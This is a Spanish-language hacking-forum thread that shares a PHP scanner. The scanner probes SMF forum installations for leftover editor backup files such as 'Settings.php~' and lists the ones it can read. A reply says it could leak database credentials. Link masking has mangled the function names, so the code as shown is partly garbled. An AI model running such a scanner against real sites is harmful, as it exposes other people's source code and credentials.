comment
IRC Chat
play_arrow
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

SMF Source Code Disclosure Seeker

  • 1 Respuestas
  • 1446 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado hielasangre

  • *
  • Underc0der
  • Mensajes: 121
  • Actividad:
    5%
  • Reputación 0
    • Ver Perfil
« en: Septiembre 02, 2011, 12:20:11 pm »
Esta tool no se si sera muy util pero por las dudas me tome el tiempo de hacerla, mas que nada sirve para ver los archivos temporales que fueron creados cuando se instalan nuevos modulos en el sistema de smf. Les dejo el codigo.

Código: PHP
  1. <html>
  2. <title>SMF Source Code Disclosure Seeker</title>
  3. <style type="text/css">
  4. body{
  5.     background: #000;
  6.     color: #FFF;
  7.     }
  8. a:visited{
  9.          color:#FFF;
  10.          text-decoration: none;
  11.          }
  12. a:link{
  13.          color:#FFF;
  14.          text-decoration: none;
  15.          }
  16. a:hover{
  17.          color:#FF0000;
  18.          text-decoration: blink;
  19.          }
  20. input,option{
  21.      font-family: verdana, sans-serif;
  22.      font-size: 16pt;
  23.      border: gray 2px solid;
  24.      }            
  25. #links{
  26.        margin:0 auto;
  27.        width:860px;
  28.        border-color: #E8E8E8;
  29.        text-align: right;
  30.        }
  31. </style>
  32. <body>
  33. <div id="links">
  34. <center>
  35. <img src="http://www.0x3a.com.ar/img/logo.png"/><br/>
  36. <form action ="" method="post">
  37. URL : <input type ="text" name="site" size="50"/>
  38. <input type = "submit" value="Test!" />
  39. </form>
  40. <?php
  41. /**
  42.  *
  43.  *
  44.  * @author Daniel Godoy
  45.  * @copyright 2011
  46.  * @Site www.0x3a.com.ar www.remoteexecution.com.ar www.delincuentedital.com.ar
  47.  *
  48.  *  This program is free software: you can redistribute it and/or modify
  49.  *  it under the terms of the GNU General Public License as published by
  50.  *  the Free Software Foundation, either version 3 of the License, or
  51.  *  (at your option) any later version.
  52.  *
  53.  *  This program is distributed in the hope that it will be useful,
  54.  *  but WITHOUT ANY WARRANTY; without even the implied warranty of
  55.  *  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
  56.  *  GNU General Public License for more details.
  57.  *
  58.  *  You should have received a copy of the GNU General Public License
  59.  *  along with this program.  If not, see <http://www.gnu.org/licenses/>.
  60.  *
  61.  *
  62.  **/
  63. You are not allowed to view links. Register or Login(0);
  64. $site = $_POST['site'];
  65. $list = You are not allowed to view links. Register or Login('index.php~', 'Settings.php~','Settings_bak.php~','/Sources/Admin.php~','/Sources/BoardIndex.php~','/Sources/Calendar.php~','/Sources/Display.php~',
  66.               '/Sources/Errors.php~','/Sources/DumpDatabase.php~','/Sources/Help.php~','/Sources/index.php~','/Sources/Karma.php~','/Sources/Load.php~',
  67.               '/Sources/LockTopic.php~','/Sources/LogInOut.php~','/Sources/ManageAttachments.php~','/Sources/ManageBans.php~','/Sources/ManageBoards.php~',
  68.               '/Sources/ManageCalendar.php~','/Sources/ManageErrors.php~','/Sources/ManageMembergroups.php~','/Sources/ManageMembers.php~',
  69.               '/Sources/ManageNews.php~','/Sources/ManagePermissions.php~','/Sources/ManagePosts.php~','/Sources/ManageRegistration.php~',
  70.               '/Sources/ManageSearch.php~','/Sources/ManageServer.php~','/Sources/ManageShoutbox.php~','/Sources/ManageSmileys.php~','/Sources/Memberlist.php~',
  71.               '/Sources/MessageIndex.php~','/Sources/Memberlist.php~','/Sources/MessageIndex.php~','/Sources/Modlog.php~','/Sources/ModSettings.php~',
  72.               '/Sources/MoveTopic.php~','/Sources/News.php~','/Sources/Notify.php~','/Sources/PackageGet.php~','/Sources/Packages.php~','/Sources/PersonalMessage.php~',
  73.               '/Sources/Poll.php~','/Sources/Post.php~','/Sources/Printpage.php~','/Sources/Profile.php~','/Sources/QueryString.php~','/Sources/Recent.php~',
  74.               '/Sources/Register.php~','/Sources/Reminder.php~','/Sources/RemoveTopic.php~','/Sources/RepairBoards.php~','/Sources/Reports.php~','/Sources/Search.php~',
  75.               '/Sources/Security.php~','/Sources/SendTopic.php~','/Sources/Shoutbox.php~','/Sources/SplitTopics.php~','/Sources/Stats.php~',
  76.               '/Sources/Subs-Auth.php~','/Sources/Subs-Boards.php~','/Sources/Subs-Charset.php~','/Sources/Subs-Compat.php~','/Sources/Subs-Graphics.php~',
  77.               '/Sources/Subs-Members.php~','/Sources/Subs-Package.php~','/Sources/Subs-Post.php~','/Sources/Subs-Shoutbox.php~','/Sources/Subs-Sound.php~',
  78.               '/Sources/Subs.php~','/Sources/Themes.php~','/Sources/ViewQuery.php~','/Sources/Who.php~','/Themes/default/Admin.template.php~',
  79.               '/Themes/default/BoardIndex.template.php~','/Themes/default/Calendar.template.php~','/Themes/default/Combat.template.php~',
  80.               '/Themes/default/Display.template.php~','/Themes/default/Errors.template.php~','/Themes/default/Help.template.php~','/Themes/default/index.php~',
  81.               '/Themes/default/index.template.php~','/Themes/default/Login.template.php~','/Themes/default/ManageAttachments.template.php~',
  82.               '/Themes/default/ManageBans.template.php~','/Themes/default/ManageBoards.template.php~','/Themes/default/ManageCalendar.template.php~',
  83.               '/Themes/default/ManageMembergroups.template.php~','/Themes/default/ManageMembers.template.php~','/Themes/default/ManageNews.template.php~',
  84.               '/Themes/default/ManagePermissions.template.php~','/Themes/default/ManageSearch.template.php~','/Themes/default/ManageShoutbox.template.php~',
  85.               '/Themes/default/ManageSmileys.template.php~','/Themes/default/Memberlist.template.php~','/Themes/default/MessageIndex.template.php~',
  86.               '/Themes/default/Modlog.template.php~','/Themes/default/MoveTopic.template.php~','/Themes/default/Notify.template.php~',
  87.               '/Themes/default/Packages.template.php~','/Themes/default/PersonalMessage.template.php~','/Themes/default/Poll.template.php~',
  88.               '/Themes/default/Post.template.php~','/Themes/default/Printpage.template.php~','/Themes/default/Profile.template.php~',
  89.               '/Themes/default/Recent.template.php~','/Themes/default/Register.template.php~','/Themes/default/Reminder.template.php~',
  90.               '/Themes/default/Reports.template.php~','/Themes/default/Search.template.php~','/Themes/default/SendTopic.template.php~','/Themes/default/Settings.template.php~',
  91.               '/Themes/default/Shoutbox.template.php~','/Themes/default/SplitTopics.template.php~','/Themes/default/Stats.template.php~',
  92.               '/Themes/default/Themes.template.php~','/Themes/default/Who.template.php~','/Themes/default/Wireless.template.php~','/Themes/default/Xml.template.php~',
  93.               '/Themes/default/languages/Admin.english.php~','/Themes/default/languages/Admin.spanish_latin.php~','/Themes/default/languages/Errors.english.php~',
  94.               '/Themes/default/languages/Errors.spanish_latin.php~','/Themes/default/languages/Help.english.php~','/Themes/default/languages/Help.spanish_latin.php~',
  95.               '/Themes/default/languages/index.english.php~','/Themes/default/languages/index.spanish_latin.php~','/Themes/default/languages/Install.english.php~',
  96.               '/Themes/default/languages/Install.spanish_latin.php~','/Themes/default/languages/Login.english.php~','/Themes/default/languages/Login.spanish_latin.php~',
  97.               '/Themes/default/languages/ManageBoards.english.php~','/Themes/default/languages/ManageBoards.spanish_latin.php~','/Themes/default/languages/ManageCalendar.english.php~',
  98.               '/Themes/default/languages/ManageCalendar.spanish_latin.php~','/Themes/default/languages/ManageMembers.english.php~','/Themes/default/languages/ManageMembers.spanish_latin.php~',
  99.               '/Themes/default/languages/ManagePermissions.english.php~','/Themes/default/languages/ManagePermissions.spanish_latin.php~','/Themes/default/languages/ManageSmileys.english.php~',
  100.               '/Themes/default/languages/ManageSmileys.spanish_latin.php~','/Themes/default/languages/Manual.english.php~','/Themes/default/languages/Manual.spanish_latin.php~',
  101.               '/Themes/default/languages/Modifications.english.php~','/Themes/default/languages/ManageSmileys.spanish_latin.php~','/Themes/default/languages/Manual.english.php~',
  102.               '/Themes/default/languages/Manual.spanish_latin.php~','/Themes/default/languages/Modifications.english.php~','/Themes/default/languages/Modifications.spanish_latin.php~',
  103.               '/Themes/default/languages/ModSettings.english.php~','/Themes/default/languages/ModSettings.spanish_latin.php~','/Themes/default/languages/Packages.english.php~',
  104.               '/Themes/default/languages/Packages.spanish_latin.php~','/Themes/default/languages/PersonalMessage.english.php~','/Themes/default/languages/PersonalMessage.spanish_latin.php~',
  105.               '/Themes/default/languages/Post.english.php~','/Themes/default/languages/Post.spanish_latin.php~','/Themes/default/languages/Profile.english.php~',
  106.               '/Themes/default/languages/Profile.spanish_latin.php~','/Themes/default/languages/Reports.english.php~','/Themes/default/languages/Reports.spanish_latin.php~',
  107.               '/Themes/default/languages/Search.english.php~','/Themes/default/languages/Search.spanish_latin.php~','/Themes/default/languages/Settings.english.php~',
  108.               '/Themes/default/languages/Settings.spanish_latin.php~','/Themes/default/languages/Shoutbox.english.php~','/Themes/default/languages/Stats.english.php~',
  109.               '/Themes/default/languages/Stats.spanish_latin.php~','/Themes/default/languages/Themes.english.php~','/Themes/default/languages/Themes.spanish_latin.php~',
  110.               '/Themes/default/languages/Who.english.php~','/Themes/default/languages/Who.spanish_latin.php~','/Themes/default/languages/Wireless.english.php~',
  111.               '/Themes/default/languages/Wireless.spanish_latin.php~',              
  112.              );
  113.  
  114. if(You are not allowed to view links. Register or Login($site)){
  115.                 foreach($list as $path => $test) {
  116.                                                  $ch = You are not allowed to view links. Register or Login();
  117.                                                  You are not allowed to view links. Register or Login($ch, CURLOPT_RETURNTRANSFER, 1);
  118.                                                  You are not allowed to view links. Register or Login($ch, CURLOPT_HEADER, 1);
  119.                                                  You are not allowed to view links. Register or Login($ch, CURLOPT_URL, $site.$test);
  120.                                                  $result = You are not allowed to view links. Register or Login($ch);
  121.                                                  You are not allowed to view links. Register or Login($ch);
  122. if (You are not allowed to view links. Register or Login("/200 OK/", $result)){
  123.                                     You are not allowed to view links. Register or Login();
  124.                                     echo '<br/>[!] <a href="'.$site.$test.'" target="_blank">'.$site.$test.'</a>';
  125.                                     You are not allowed to view links. Register or Login();
  126.                                     }
  127.                                    
  128.                                  
  129.                                                 }      
  130.                 }
  131.  
  132. ?>
  133. </center>
  134. </div>
  135. </body>
  136. </html>
  137.  

Ejemplo obtenido al correr el script.

[!] You are not allowed to view links. Register or Login
[!] You are not allowed to view links. Register or Login
[!] You are not allowed to view links. Register or Login
[!] You are not allowed to view links. Register or Login
[!] You are not allowed to view links. Register or Login
[!] You are not allowed to view links. Register or Login
[!] You are not allowed to view links. Register or Login
[!] You are not allowed to view links. Register or Login
[!] You are not allowed to view links. Register or Login
[!] You are not allowed to view links. Register or Login
[!] You are not allowed to view links. Register or Login
[!] You are not allowed to view links. Register or Login
[!] You are not allowed to view links. Register or Login
[!] You are not allowed to view links. Register or Login
[!] You are not allowed to view links. Register or Login
[!] You are not allowed to view links. Register or Login
[!] You are not allowed to view links. Register or Login
[!] You are not allowed to view links. Register or Login
[!] You are not allowed to view links. Register or Login
[!] You are not allowed to view links. Register or Login
[!] You are not allowed to view links. Register or Login
[!] You are not allowed to view links. Register or Login
[!] You are not allowed to view links. Register or Login
[!] You are not allowed to view links. Register or Login
[!] You are not allowed to view links. Register or Login
[!] You are not allowed to view links. Register or Login
[!] You are not allowed to view links. Register or Login
[!] You are not allowed to view links. Register or Login
[!] You are not allowed to view links. Register or Login
[!] You are not allowed to view links. Register or Login
[!] You are not allowed to view links. Register or Login
[!] You are not allowed to view links. Register or Login
[!] You are not allowed to view links. Register or Login
[!] You are not allowed to view links. Register or Login
[!] You are not allowed to view links. Register or Login
[!] You are not allowed to view links. Register or Login
[!] You are not allowed to view links. Register or Login
[!] You are not allowed to view links. Register or Login
[!] You are not allowed to view links. Register or Login
[!] You are not allowed to view links. Register or Login
« Última modificación: Marzo 22, 2014, 02:08:28 pm por Expermicid »

Desconectado FahD

  • *
  • Underc0der
  • Mensajes: 26
  • Actividad:
    0%
  • Reputación 0
  • مبروك رمضان
    • Ver Perfil
« Respuesta #1 en: Septiembre 06, 2011, 12:02:26 am »
útil lo es, otra cosa es que sea es que sea eficaz a la hora de encontrar sacar datos útiles, en este caso como mucho se sacará la bd siempre y cuando esté el archivo temporal de la conexión.
Gracias por aportar ;)

 

¿Te gustó el post? COMPARTILO!



[SOURCE] Mensaje antes de header , pop up php , alert antes de header

Iniciado por graphixx

Respuestas: 1
Vistas: 2766
Último mensaje Octubre 05, 2014, 03:26:32 pm
por alexander1712
[Source] Verificar si una dirección IP es válida y si es IPv6 o IPv4

Iniciado por Polsaker

Respuestas: 1
Vistas: 1391
Último mensaje Octubre 22, 2014, 10:50:39 pm
por alexander1712
[SOURCE] Convertir numero a texto con PHP (Class)

Iniciado por kid_goth

Respuestas: 1
Vistas: 919
Último mensaje Septiembre 09, 2014, 04:29:24 pm
por ANTRAX
[Source] Verificar si una dirección IP está en una DNSBL

Iniciado por Polsaker

Respuestas: 2
Vistas: 1364
Último mensaje Octubre 22, 2014, 10:51:27 pm
por alexander1712